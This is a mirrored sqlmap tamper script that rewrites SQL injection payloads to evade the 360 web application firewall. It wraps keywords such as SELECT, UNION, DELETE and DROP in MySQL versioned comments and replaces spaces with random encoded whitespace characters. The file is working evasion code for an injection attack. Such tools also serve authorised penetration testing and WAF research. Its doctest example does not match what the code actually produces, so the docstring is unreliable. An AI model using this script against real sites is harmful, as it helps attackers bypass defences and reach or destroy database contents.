mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-02-08 08:29:35 +03:00
44 lines
1.2 KiB
Python
44 lines
1.2 KiB
Python
#!/usr/bin/env python
|
|
|
|
"""
|
|
bypass 360waf
|
|
|
|
author: FK_T
|
|
"Fuzz自动化Bypass软WAF姿势"
|
|
|
|
"""
|
|
|
|
import random
|
|
|
|
from lib.core.enums import PRIORITY
|
|
from lib.core.settings import UNICODE_ENCODING
|
|
|
|
__priority__ = PRIORITY.LOW
|
|
|
|
|
|
def dependencies():
|
|
pass
|
|
|
|
|
|
def tamper(payload, **kwargs):
|
|
"""
|
|
Replaces keywords
|
|
>>> tamper('UNION SELECT ID FROM USERS')
|
|
'union%0a/*!99999select*/id%0a/*!99999from*/users'
|
|
"""
|
|
|
|
if payload:
|
|
payload = payload.replace("SELECT", "/*!99999select*/")
|
|
payload = payload.replace("UNION", "/*!99999union*/")
|
|
payload = payload.replace("FROM", "/*!99999from*/")
|
|
payload = payload.replace("CONCAT", "/*!99999CONCAT*/")
|
|
payload = payload.replace("CASE", "/*!99999CASE*/")
|
|
payload = payload.replace("CAST", "/*!99999CAST*/")
|
|
payload = payload.replace("DATABASE", "/*!99999DATABASE*0a()*/")
|
|
payload = payload.replace("ALTER", "/*!99999ALTER*/")
|
|
payload = payload.replace("DELETE", "/*!99999DELETE*/")
|
|
payload = payload.replace("DROP", "/*!99999DROP*/")
|
|
space = ['%09', '%0a', '%0b', '%0c', '%0d', '%20', '%a0']
|
|
payload = payload.replace(" ", space[random.randint(0, 6)])
|
|
return payload
|